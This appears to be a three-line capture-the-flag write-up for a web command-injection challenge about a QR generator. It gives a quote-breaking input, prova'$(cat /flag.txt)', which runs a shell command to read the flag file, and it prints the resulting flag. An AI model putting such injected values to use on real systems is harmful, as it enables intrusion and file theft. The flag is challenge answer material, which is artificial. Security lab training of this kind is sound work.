Files
OffSec-CTF/web-cmdi/02_qrdrop/writeup.txt
2026-05-10 20:42:33 +02:00

4 lines
167 B
Plaintext

using ' We can escape the command and inject bash code.
INPUT: prova'$(cat /flag.txt)'
OUTPUT (from the decoded qr): provaoffsec{qr_dr0p_qu0t3_br34k_booPPFJAAhS0QtOb}